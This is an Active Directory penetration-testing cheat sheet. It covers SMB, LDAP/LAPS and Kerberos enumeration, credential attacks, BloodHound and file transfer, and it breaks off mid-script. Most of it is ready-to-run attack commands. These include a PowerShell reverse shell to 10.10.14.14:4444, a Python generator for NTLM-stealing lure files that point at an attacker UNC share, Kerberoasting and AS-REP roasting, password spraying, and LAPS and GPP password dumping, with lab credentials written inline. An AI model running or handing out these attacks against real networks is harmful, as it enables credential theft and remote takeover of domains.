Active Directory Cheat Sheet

Table of Contents

  1. SMB Enumeration

  2. User Enumeration

  3. LDAP/LAPS Enumeration

  4. Kerberos Attacks

  5. Credential Attacks

  6. BloodHound Collection

  7. File Transfer Methods

  8. Windows Post-Exploitation

  9. Privilege Escalation

  10. ADCS (Certificate Services)

  11. ACL Abuse

  12. Miscellaneous Tools

SMB Enumeration

SMB Share Listing

Always try multiple tools for listing shares:

# NetExec (formerly CrackMapExec)
nxc smb <ip> -u '' -p '' --shares
nxc smb <ip> -u 'Guest' -p '' --shares
nxc smb <ip> -u 'systemd' -p '' --shares

# SMBClient
smbclient -L //<IP_OR_DOMAIN> -N

# SMBMap
smbmap -H <ip>

Crawling Shares & Extracting Files

# Spider shares
nxc smb <target_ip> -u 'Guest' -p '' -M spider_plus

# View discovered files (spider_plus writes one JSON per host under ~/.nxc/modules/nxc_spider_plus/; add -o DOWNLOAD_FLAG=True to pull the files too)
jq 'map_values(keys)' ~/.nxc/modules/nxc_spider_plus/<ip>.json

# Download specific file
nxc smb <target_ip> -u 'Guest' -p '' --share <share_name> --get-file Dev/winrm_backup.zip winrm_back.zip

LNK File Attack (SMB Write Permission / NTLM Theft)

# Method 1: NetExec slinky module
nxc smb <ip> -u 'username' -p 'password' -M slinky -o SERVER=<attacker_ip> SHARES="<share_name>" NAME=malicious

# Method 2: desktop.ini file (Explorer reads it when the folder is browsed; the folder must carry the read-only or system attribute for it to be honoured)
# Create desktop.ini with content:
[.ShellClassInfo]
IconResource=\\10.10.14.9\aa
# Upload to writable share

# Method 3: ntlm_theft (generates multiple file types)
ntlm_theft -g all -s 10.10.14.14 -f systemd
# Then upload everything from inside smbclient:
# recurse on
# prompt off
# mput *
# Responder must already be listening on the attacker interface to catch the NTLMv2 response

# Method 4: CVE-2025-24071
# https://github.com/Marcejr117/CVE-2025-24071_PoC
python poc.py <foldername> <LOCALIP>

# Method 5: SMB_Killer
# https://github.com/overgrowncarrot1/SMB_Killer
python3 smb_killer.py -l 192.168.132.92 -i tun0 -r 10.48.139.19 -a data -A -o hash
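Every lure above is the same idea: a file whose icon or shortcut target lives on a UNC path you control, so the victim's Explorer performs an SMB session setup, and therefore an NTLM authentication, the moment it renders the folder. As an added example that is not ntlm_theft or any other tool on this page, the generator below writes the three text-based formats (desktop.ini, .url, .scf) for an attacker IP and share name of your choosing; the share and icon file names are arbitrary because the authentication happens before the server ever resolves the path. Two caveats: desktop.ini is only honoured when the folder it sits in carries the read-only or system attribute, and current Explorer builds largely ignore .scf icons, so on patched targets expect the .url and the .lnk from the slinky module to do the work.

```python
#!/usr/bin/env python3
"""Generate text-based NTLM-coercion lure files (added example, not ntlm_theft)."""
import os
import sys


def unc_path(attacker_ip: str, share: str, filename: str = "icon.ico") -> str:
    # \\<attacker>\<share>\<file>. Share and file are arbitrary: the victim
    # authenticates during SMB session setup, before the server looks the path up.
    return "\\\\" + attacker_ip + "\\" + share + "\\" + filename


def build_lures(attacker_ip: str, share: str = "aa", name: str = "lure") -> dict:
    """Return {filename: content}. CRLF line endings, as Explorer's INI parser expects."""
    icon = unc_path(attacker_ip, share)
    crlf = "\r\n"
    return {
        # Read by Explorer when it lists the folder the file sits in.
        "desktop.ini": crlf.join(["[.ShellClassInfo]", "IconResource=" + icon + ",0", ""]),
        # Internet shortcut: the icon is fetched as soon as the file is displayed.
        name + ".url": crlf.join([
            "[InternetShortcut]",
            "URL=file://" + attacker_ip + "/" + share + "/" + name,
            "IconFile=" + icon,
            "IconIndex=1",
            "",
        ]),
        # Shell Command File (legacy "show desktop" format; opportunistic on modern builds).
        name + ".scf": crlf.join([
            "[Shell]", "Command=2", "IconFile=" + icon, "[Taskbar]", "Command=ToggleDesktop", "",
        ]),
    }


def write_lures(attacker_ip: str, outdir: str, share: str = "aa", name: str = "lure") -> list:
    """Write the lures into outdir (created if missing) and return the paths written."""
    os.makedirs(outdir, exist_ok=True)
    written = []
    for fname, body in build_lures(attacker_ip, share, name).items():
        path = os.path.join(outdir, fname)
        with open(path, "w", encoding="ascii", newline="") as fh:  # newline="" keeps CRLF intact
            fh.write(body)
        written.append(path)
    return written


if __name__ == "__main__":
    # usage: python3 lures.py <attacker_ip> <outdir> [share] [name]
    ip, outdir = sys.argv[1], sys.argv[2]
    share = sys.argv[3] if len(sys.argv) > 3 else "aa"
    name = sys.argv[4] if len(sys.argv) > 4 else "lure"
    for p in write_lures(ip, outdir, share, name):
        print("wrote", p)
```

Drop the output directory into the writable share with smbclient's mput as in Method 3, with Responder or ntlmrelayx already listening on the interface the attacker IP belongs to.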

SMB Server (File Transfer)

# On Kali (with authentication)
smbserver.py -username systemd -password systemd share . -smb2support

# On Kali (without authentication)
impacket-smbserver share . -smb2support

# On Windows (connect to share)
net use \\<attacker_ip>\share /user:systemd systemd
net use \\192.168.132.92\share /user:systemd systemd
# cmd.exe refuses to cd into a UNC path; map it with pushd instead (PowerShell can cd there directly)
pushd \\<attacker_ip>\share

# Cleanup
net use * /delete /y

User Enumeration

Username Enumeration via RID Brute

# Guest account
nxc smb <target_ip> -u 'Guest' -p '' --rid-brute

# Anonymous
nxc smb <target_ip> -u '' -p '' --rid-brute

# With credentials (--users lists accounts directly, including the description field, where passwords sometimes sit)
nxc smb 10.10.10.10 -u 'SVC_APACHE' -p 'S@Ss!K@*t13' --users

Impacket Tools

# Lookup SID
impacket-lookupsid flight.htb/SVC_APACHE:'S@Ss!K@*t13'@10.10.11.187

# Get AD Users
impacket-GetADUsers -all -dc-ip 10.10.11.187 flight.htb/svc_apache
impacket-GetADUsers -all -dc-ip 10.10.10.182 cascade.local/''

Kerbrute (Kerberos User Enumeration)

kerbrute userenum --domain htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc <dc_ip>

# Example
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175

Nmap Kerberos Enumeration

nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} {IP}

# Example
nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="vault.offsec",userdb='/home/kali/Desktop/wordlists/seclists/Usernames/Names/names.txt' 10.10.10.100

Other Enumeration Tools

# enum4linux-ng
enum4linux-ng 10.10.11.187 -u 'SVC_APACHE' -p 'S@Ss!K@*t13' -U

# rpcclient
rpcclient -U 'flight.htb/SVC_APACHE%S@Ss!K@*t13' -W flight.htb -c "enumdomusers;quit" 10.10.11.187

# RPC Anonymous
rpcclient -U "" -N <ip>
# Inside rpcclient:
querydispinfo
enumdomusers

Extract Usernames from Website

# Method 1: Basic grep
curl windcorp.thm | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b"

# Method 2: Advanced extraction
curl -sL 'http://windcorp.thm' \
  | grep -E -o "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}" \
  | sort -u

# Method 3: Extract usernames only (before @)
curl -sL 'http://windcorp.thm' \
  | grep -E -o "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}" \
  | awk -F'@' '{print $1}' \
  | sort -u

# Method 4: Using lynx
curl -sL 'http://windcorp.thm' \
  | lynx -stdin -dump -nonumbers \
  | grep -E -o "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}" \
  | sort -u

# Method 5: Perl regex
curl -sL 'http://windcorp.thm' \
  | grep -Po '(?<![A-Za-z0-9._%+-])[A-Za-z0-9._%+-]+(?=@)' \
  | sort -u
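Scraped e-mail addresses give away the naming convention; scraped full names have to be turned into candidate usernames before kerbrute or nxc can test them. The generator below is an added example (not from this page or from kerbrute), and its FORMATS list is an assumption about common corporate conventions: once one account validates, trim the list to the matching format and rerun against names.txt.

```python
#!/usr/bin/env python3
"""Expand harvested real names into candidate usernames for kerbrute/nxc.

Added example, not from the original page. FORMATS is an assumption about
common naming conventions; keep only the one that validates against the target.
"""
import re
import sys
import unicodedata

FORMATS = [
    "{f}{last}",        # jsmith
    "{first}.{last}",   # john.smith
    "{first}{last}",    # johnsmith
    "{first}_{last}",   # john_smith
    "{first}.{l}",      # john.s
    "{f}.{last}",       # j.smith
    "{last}{f}",        # smithj
    "{last}.{first}",   # smith.john
    "{f}{l}",           # js
    "{first}",          # john
    "{last}",           # smith
]
SAM_MAX = 20  # sAMAccountName length limit for user accounts


def _clean(token: str) -> str:
    """Lower-case ASCII letters/digits only: O'Neil -> oneil, Muller with umlaut -> muller."""
    ascii_only = unicodedata.normalize("NFKD", token).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z0-9]", "", ascii_only.lower())


def permutations(full_name: str, formats=FORMATS) -> list:
    """Candidate usernames for one 'First [Middle] Last' string, in format order, no duplicates."""
    parts = [p for p in (_clean(t) for t in full_name.split()) if p]
    if not parts:
        return []
    if len(parts) == 1:
        return parts                      # already looks like a username
    first, last = parts[0], parts[-1]     # middle names are dropped
    out, seen = [], set()
    for fmt in formats:
        cand = fmt.format(first=first, last=last, f=first[0], l=last[0])
        if cand not in seen and len(cand) <= SAM_MAX:
            seen.add(cand)
            out.append(cand)
    return out


def build_wordlist(names, formats=FORMATS) -> list:
    """De-duplicated wordlist across all names, preserving first-seen order."""
    out, seen = [], set()
    for name in names:
        for cand in permutations(name, formats):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


if __name__ == "__main__":
    # usage: python3 gen_users.py < names.txt > users.txt
    names = [line.strip() for line in sys.stdin if line.strip()]
    sys.stdout.write("\n".join(build_wordlist(names)) + "\n")
```

Feed the result to kerbrute userenum (it only needs the list file) and keep the wordlist small: every candidate is one AS-REQ against the KDC, which is logged as event 4768 when the account exists.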

Useful Wordlists

  • /usr/share/seclists/Usernames/Names/names.txt

  • /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

LDAP/LAPS Enumeration

Basic LDAP Enumeration

# Get namingContexts (Base DN)
ldapsearch -H ldap://$IP -x -s base namingContexts

# Enumerate all users
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" "(objectClass=user)" sAMAccountName

# Include descriptions (often contains passwords)
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" "(objectClass=person)" | grep -i pwd

# Enumerate all groups
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" "(objectClass=group)" cn

# Enumerate computer objects
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" "(objectClass=computer)" dNSHostName

# All objects, all attributes (the argument must be an LDAP filter, not a bare *)
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" "(objectClass=*)"

# Dump to file
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" > ldap-anonymous

# Get just people
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-people

# Sort and analyze
cat <filename> | sort | uniq -c | sort -n

Authenticated LDAP Searches

# Basic authenticated search (quote the trailing * so the shell does not expand it to file names)
ldapsearch -x -LLL -H ldap://10.10.10.182 -D "<user>@cascade.local" -w 'rY4n5eva' -b "dc=cascade,dc=local" "(objectClass=user)" '*'

# User with group membership
ldapsearch -H ldap://10.10.11.76 -x -D "<user>@voleur.htb" -w "HollowOct31Nyt" -b "DC=voleur,DC=htb" "(objectclass=user)" sAMAccountName memberOf

# All users with basic info
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=user)(sAMAccountName=*))" sAMAccountName displayName mail

# Users with descriptions (often passwords)
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=user)(description=*))" sAMAccountName description

# Domain Admins
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=user)(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=local))" sAMAccountName

# Administrators group
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=user)(memberOf=CN=Administrators,CN=Users,DC=domain,DC=local))" sAMAccountName

# All computers
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(objectclass=computer)" name operatingSystem dNSHostName

# Servers
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=computer)(operatingSystem=*Server*))" name operatingSystem

# Unconstrained delegation
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" sAMAccountName

# Constrained delegation
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(msDS-AllowedToDelegateTo=*)" sAMAccountName msDS-AllowedToDelegateTo
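The delegation filters above use the :1.2.840.113556.1.4.803: matching rule because userAccountControl is a bitmask: 524288 (TRUSTED_FOR_DELEGATION) or 4194304 (DONT_REQ_PREAUTH) has to be tested as a bit, not compared for equality. The script below is an added example, not part of the page or of any tool on it; it reads ldapsearch's LDIF output, decodes the bits and flags AS-REP roastable, unconstrained-delegation, constrained-delegation and disabled accounts, and it can print the filter for any flag. The LDIF it ships with is constructed to exercise each case (the base64 description line shows how ldapsearch emits non-ASCII or binary values with a double colon).

```python
#!/usr/bin/env python3
"""Decode userAccountControl from ldapsearch LDIF and triage accounts.

Added example, not from the original page. The sample LDIF is constructed.
"""
import base64

UAC = {                                  # subset of the documented flag bits
    "ACCOUNTDISABLE":                 0x0002,
    "PASSWD_NOTREQD":                 0x0020,
    "NORMAL_ACCOUNT":                 0x0200,
    "WORKSTATION_TRUST_ACCOUNT":      0x1000,
    "SERVER_TRUST_ACCOUNT":           0x2000,
    "DONT_EXPIRE_PASSWORD":           0x10000,
    "TRUSTED_FOR_DELEGATION":         0x80000,    # 524288: unconstrained delegation
    "NOT_DELEGATED":                  0x100000,
    "DONT_REQ_PREAUTH":               0x400000,   # 4194304: AS-REP roastable
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # constrained delegation with protocol transition
}
BIT_AND = "1.2.840.113556.1.4.803"


def flag_filter(flag: str, object_class: str = "user") -> str:
    """LDAP filter matching objects that have the given UAC bit set."""
    return "(&(objectClass=%s)(userAccountControl:%s:=%d))" % (object_class, BIT_AND, UAC[flag])


def decode_uac(value: int) -> list:
    return [name for name, bit in UAC.items() if value & bit]


def parse_ldif(text: str) -> list:
    """Minimal LDIF reader: blank-line separated entries, folded continuation lines
    joined, 'attr: value' and base64 'attr:: value'; every attribute becomes a list."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]          # LDIF folds long lines with a leading space
        else:
            lines.append(raw)
    entries, cur = [], {}
    for line in lines + [""]:
        if not line.strip():
            if cur:
                entries.append(cur)
                cur = {}
        elif line.startswith("#"):
            continue
        elif ":: " in line:
            attr, val = line.split(":: ", 1)
            cur.setdefault(attr, []).append(base64.b64decode(val).decode("utf-8", "replace"))
        elif ": " in line:
            attr, val = line.split(": ", 1)
            cur.setdefault(attr, []).append(val)
    return entries


def triage(entries) -> list:
    """[(sAMAccountName, [findings])] for entries whose UAC bits or delegation attributes matter."""
    report = []
    for e in entries:
        if "userAccountControl" not in e:
            continue
        flags = decode_uac(int(e["userAccountControl"][0]))
        findings = []
        if "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags:
            findings.append("AS-REP roastable")
        if "TRUSTED_FOR_DELEGATION" in flags:
            findings.append("unconstrained delegation")
        if "msDS-AllowedToDelegateTo" in e:
            kind = ("constrained delegation (protocol transition)"
                    if "TRUSTED_TO_AUTH_FOR_DELEGATION" in flags else "constrained delegation")
            findings.append(kind + " -> " + ", ".join(e["msDS-AllowedToDelegateTo"]))
        if "PASSWD_NOTREQD" in flags:
            findings.append("password not required")
        if "ACCOUNTDISABLE" in flags:
            findings.append("disabled")
        if findings:
            report.append((e.get("sAMAccountName", ["?"])[0], findings))
    return report


SAMPLE_LDIF = """\
# constructed sample in ldapsearch's output shape
dn: CN=svc_backup,CN=Users,DC=cascade,DC=local
sAMAccountName: svc_backup
userAccountControl: 4260352

dn: CN=APPSRV01,CN=Computers,DC=cascade,DC=local
sAMAccountName: APPSRV01$
userAccountControl: 528384

dn: CN=WEB01,CN=Computers,DC=cascade,DC=local
sAMAccountName: WEB01$
userAccountControl: 16781312
msDS-AllowedToDelegateTo: cifs/dc01.cascade.local
msDS-AllowedToDelegateTo: cifs/dc01

dn: CN=old.user,CN=Users,DC=cascade,DC=local
sAMAccountName: old.user
description:: VGVtcCBwYXNzd29yZDogV2VsY29tZTEh
userAccountControl: 514
"""

if __name__ == "__main__":
    # usage: ldapsearch ... "(objectClass=user)" sAMAccountName userAccountControl msDS-AllowedToDelegateTo > users.ldif
    #        python3 uac_triage.py < users.ldif   (falls back to the constructed sample on a tty)
    import sys
    text = SAMPLE_LDIF if sys.stdin.isatty() else sys.stdin.read()
    for name, findings in triage(parse_ldif(text)):
        print("%-12s %s" % (name, "; ".join(findings)))
    print(flag_filter("DONT_REQ_PREAUTH"))
```

Domain controllers always carry TRUSTED_FOR_DELEGATION, so an unconstrained-delegation hit is only interesting on a member server or workstation; a disabled account with DONT_REQ_PREAUTH is excluded because the KDC will not issue an AS-REP for it anyway.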

LAPS (Local Administrator Password Solution)

Query LAPS passwords for managed computers:


# Method 1: ldapsearch (needs -x for a simple bind; recent OpenLDAP only accepts -H ldap://host, the old -h host switch is gone)
ldapsearch -x -D <user>@<domain> -w <password> -o ldif-wrap=no -H ldap://<domain_controller> -b 'dc=<domain>,dc=<tld>' "(ms-MCS-AdmPwd=*)" ms-Mcs-AdmPwd

# Example (the value only comes back for principals granted read on ms-Mcs-AdmPwd; Windows LAPS stores it in msLAPS-Password instead)
ldapsearch -x -D fmcsorley@hutch.offsec -w CrabSharkJellyfish192 -o ldif-wrap=no -H ldap://hutch.offsec -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-Mcs-AdmPwd

# Method 2: NetExec
nxc ldap hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -M laps

# Method 3: pyLAPS (-d takes the domain name; the DC address goes in --dc-ip)
./pyLAPS.py --action get -d "hutch.offsec" -u fmcsorley -p 'CrabSharkJellyfish192' --dc-ip 192.168.223.122

# Method 4: LAPSDumper
# https://github.com/n00py/LAPSDumper
git clone https://github.com/n00py/LAPSDumper
python laps.py -u 'raj' -p 'Password@1' -d 'ignite.local'

# Method 5: bloodyAD
bloodyAD --host "192.168.223.122" -d "hutch.offsec" -u "fmcsorley" -p "CrabSharkJellyfish192" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

# Method 6: ldap_shell
# https://github.com/PShlyundin/ldap_shell
git clone https://github.com/PShlyundin/ldap_shell
ldap_shell ignite.local/raj:Password@1 -dc-ip 192.168.1.48

# Method 7: Windows Registry Check
reg query "HKLM\SOFTWARE\Policies\Microsoft Services\AdmPwd" /s
# Should show: AdmPwdEnabled REG_DWORD 0x1

# Method 8: PowerView (from a domain session; the attribute is only returned if the current principal has read access on it)
Get-DomainObject -Identity <computer$> -Properties ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Get GPP Passwords

Get-GPPPassword.py hutch.offsec/fmcsorley:'CrabSharkJellyfish192'@192.168.223.122

NetExec Group Enumeration

# --groups works over smb or ldap; pass a group name to list its members
nxc smb 10.10.11.187 -u 'SVC_APACHE' -p 'S@Ss!K@*t13' --groups

Kerberos Attacks

Request TGT & Usage

# Request TGT
impacket-getTGT domain.htb/'username':'password'

# Export for use
export KRB5CCNAME=username.ccache

# Use the ticket with NetExec (-k switches to Kerberos, --use-kcache reads the ccache from KRB5CCNAME instead of a password; target by FQDN, not IP)
nxc smb <dc_fqdn> -u username -k --use-kcache --shares

# Generate krb5.conf (realm/KDC mapping Kerberos tools need before the ccache is usable)
nxc smb <ip> -u "username" -p "password" -k --generate-krb5-file /etc/krb5.conf

Kerberoasting

# Basic kerberoasting (-request-user limits the request to one SPN account; without it every account with an SPN is requested)
impacket-GetUserSPNs -dc-ip <ip> domain.htb/username:password -request-user administrator -outputfile hashes.txt
impacket-GetUserSPNs -request -dc-ip <ip> domain.htb/username

# Using NetExec
nxc ldap <dc_ip> -u username -p 'password' --kerberoasting output.txt

# Targeted kerberoasting (sets an SPN on accounts you have write access to, roasts them, then removes the SPN)
targetedKerberoast.py -v -d 'domain.htb' -u 'username' -p 'password' --dc-ip <dc_ip>

# With ccache file
targetedKerberoast.py -k --dc-host dc.domain.htb -u username -d domain.htb

# Example with credentials
impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -request-user administrator -outputfile hashessss
nxc ldap 10.10.10.100 -u svc_tgs -p 'GPPstillStandingStrong2k18' --kerberoasting output.txt
targetedKerberoast.py -v -d 'active.htb' -u 'svc_tgs' -p 'GPPstillStandingStrong2k18'

# Crack the hashes (13100 is the RC4/etype 23 mode; AES tickets, $krb5tgs$17$ and $krb5tgs$18$, need 19600 and 19700)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 --show kerberoast_hashes.txt

From Compromised Service Account (Rubeus)

.\Rubeus.exe kerberoast /nowrap

# Crack the hash (13100 for $krb5tgs$23$ output; check the etype in the prefix first)
hashcat -m 13100 raw_hash /usr/share/wordlists/rockyou.txt
hashcat -m 13100 --show raw_hash

AS-REP Roasting

# With username list
GetNPUsers.py 'DOMAIN.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip <dc_ip>

# Alternative syntax
impacket-GetNPUsers domain.com/ -usersfile users.txt -no-pass

# Examples
GetNPUsers.py 'HTB.LOCAL/' -usersfile users -dc-ip 10.10.10.161 -format hashcat
GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
impacket-GetNPUsers klay.thm/ -usersfile users.txt -no-pass

# Using NetExec
nxc ldap 10.10.10.161 -u users -p '' --asreproast output.hash
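Both Kerberoast and AS-REP roast output carry the encryption type in the hash prefix, and -m 13100 / -m 18200 are only right for RC4 (etype 23); an account flagged for AES returns a $krb5tgs$17$ or $krb5tgs$18$ hash that hashcat rejects under 13100. The sorter below is an added example (not impacket, NetExec or hashcat code) that classifies each line from either attack, writes one file per hashcat mode and prints the matching commands. AS-REP hashes with AES etypes are reported but left unmapped because their mode numbers depend on the hashcat version. The sample lines are constructed: real prefixes and field layout, placeholder ciphertext.

```python
#!/usr/bin/env python3
"""Sort Kerberoast / AS-REP roast hashes into the right hashcat mode.

Added example, not part of the original page or of impacket/hashcat.
"""
import re
from collections import defaultdict

# hashcat modes by (hash family, Kerberos etype). RC4 (23) is the common case;
# accounts with "supports Kerberos AES 128/256 bit encryption" return etype 17/18.
MODES = {
    ("krb5tgs", 23): 13100,
    ("krb5tgs", 17): 19600,
    ("krb5tgs", 18): 19700,
    ("krb5asrep", 23): 18200,
}

HEADER = re.compile(r"^\$(krb5tgs|krb5asrep)\$(\d+)\$(.*)$")


def classify(line: str):
    """Return {family, etype, mode, user, realm} for one hash line, or None if it is not one."""
    m = HEADER.match(line.strip())
    if not m:
        return None
    family, etype, rest = m.group(1), int(m.group(2)), m.group(3)
    if family == "krb5tgs":
        # $krb5tgs$23$*user$REALM$spn*$...   or   $krb5tgs$18$user$REALM$*spn*$...
        fields = rest.split("$")
        user, realm = fields[0].lstrip("*"), fields[1]
    else:
        # $krb5asrep$23$user@REALM:checksum$edata
        principal = rest.split(":", 1)[0]
        user, _, realm = principal.partition("@")
    return {"family": family, "etype": etype, "mode": MODES.get((family, etype)),
            "user": user, "realm": realm}


def split_by_mode(lines):
    """Group hash lines by hashcat mode; etypes this table does not cover land under None."""
    groups = defaultdict(list)
    for line in lines:
        info = classify(line)
        if info:
            groups[info["mode"]].append(line.strip())
    return dict(groups)


def hashcat_commands(groups, wordlist="/usr/share/wordlists/rockyou.txt"):
    """One hashcat invocation per mode (hashcat accepts a single -m per run)."""
    cmds = []
    for mode, hashes in sorted(groups.items(), key=lambda kv: kv[0] or 0):
        if mode is None:
            cmds.append("# %d hash(es) with an etype not in MODES; see hashcat --help" % len(hashes))
        else:
            cmds.append("hashcat -m %d hashes_%d.txt %s" % (mode, mode, wordlist))
    return cmds


# Constructed sample: real prefixes and field layout, placeholder ciphertext.
SAMPLE = """\
$krb5tgs$23$*svc_tgs$ACTIVE.HTB$active.htb/svc_tgs*$0123456789abcdef0123456789abcdef$00ff00ff00ff00ff
$krb5tgs$18$svc_sql$ACTIVE.HTB$*MSSQLSvc/sql01.active.htb:1433*$0123456789abcdef0123456789abcdef$00ff00ff00ff00ff
$krb5asrep$23$asrep_user@HTB.LOCAL:0123456789abcdef0123456789abcdef$00ff00ff00ff00ff
"""

if __name__ == "__main__":
    # usage: cat output.txt hashes.aspreroast | python3 sort_krb_hashes.py
    import sys
    lines = SAMPLE.splitlines() if sys.stdin.isatty() else sys.stdin.read().splitlines()
    groups = split_by_mode(lines)
    for mode, hashes in groups.items():
        if mode is not None:
            with open("hashes_%d.txt" % mode, "w") as fh:
                fh.write("\n".join(hashes) + "\n")
    print("\n".join(hashcat_commands(groups)))
```

If most of your Kerberoast output is AES, request RC4 tickets explicitly where the tooling allows it (Rubeus /rc4opsec, or targeting accounts without the AES flags) rather than burning GPU time on 19700.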

Clock Skew Fix

# The KDC rejects requests whose timestamp is more than 5 minutes off its own clock (KRB_AP_ERR_SKEW), so sync to the DC first
sudo timedatectl set-ntp off
sudo rdate -n <target IP>

Credential Attacks

Password Spraying

# Try username as password (--no-bruteforce pairs line N of the user file with line N of the password file instead of every combination; check the lockout policy with --pass-pol before spraying)
nxc smb <ip> -u users.txt -p users.txt --no-bruteforce --continue-on-success

# Example
crackmapexec smb 10.10.10.172 -u users -p users --no-bruteforce --continue-on-success

SSH Key Spray

nxc ssh IPs -u username -p '<passphrase if any>' --key-file <id_rsa> --continue-on-success

Hash Cracking

# Kerberoast
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

# NTLM
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt

# Show cracked (--show needs the same -m as the cracking run)
hashcat -m 1000 --show ntlm_hashes.txt

BloodHound Collection

bloodhound-python

# With Kerberos
bloodhound-python -u username -p password -k -ns <dc_ip> -c All -d domain.htb --zip

# Without Kerberos
bloodhound-python -u username -p password -ns <dc_ip> -c All -d domain.htb --zip

# Example
bloodhound-python -c all -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' --zip -ns 10.10.11.72

# Using NetExec (collection runs over the ldap protocol, not smb)
nxc ldap $IP -u $user -p $pass --bloodhound --collection All --dns-server $IP

Rusthound


rusthound-ce -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' --zip -c All

File Transfer Methods

SMB Server (Covered in SMB section above)

PowerShell Reverse Shell

# Reverse shell (no nc.exe needed)
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Perl Download

perl -MHTTP::Tiny -e 'HTTP::Tiny->new->mirror("http://10.10.14.12/agent","file")'

Base64 Exfiltration

# Windows: Convert file to base64 (-Encoding byte is Windows PowerShell 5.1; on PowerShell 7 use -AsByteStream instead)
[convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))

# Linux: Decode
echo '<base64_string>' | base64 -d > file.pdf

Finding SID

# Windows (dsquery)
dsquery computer -name APPSRV01 | dsget computer -sid

# PowerShell
Get-ADComputer -Identity "APPSRV01" -Properties SID | Select-Object Name, SID

# Whoami
whoami /user

# Impacket
impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb
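ldapsearch prints objectSid as base64 (objectSid:: AQUAAA...) because it is a binary attribute, and lookupsid / --rid-brute are really enumerating the last sub-authority (the RID) of such values. The converter below is an added example, not part of impacket or of this page; it decodes the binary layout, splits a SID into its domain part and RID, and pulls sAMAccountName/SID pairs out of an LDIF dump. The domain SID and the accounts in its sample are constructed.

```python
#!/usr/bin/env python3
"""objectSid <-> S-1-... conversion and RID extraction from ldapsearch output.

Added example, not part of the original page or of impacket. Sample data is constructed.
"""
import base64
import struct

# RIDs that mean the same thing in every domain (partial list).
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins"}


def bytes_to_sid(raw: bytes) -> str:
    """Binary SID -> 'S-1-5-21-...'. Layout: revision(1), sub-authority count(1),
    identifier authority(6, big-endian), then count x 4-byte little-endian sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if revision != 1 or len(raw) != 8 + 4 * count:
        raise ValueError("malformed SID (revision %d, %d bytes for %d sub-authorities)"
                         % (revision, len(raw), count))
    authority = int.from_bytes(raw[2:8], "big")
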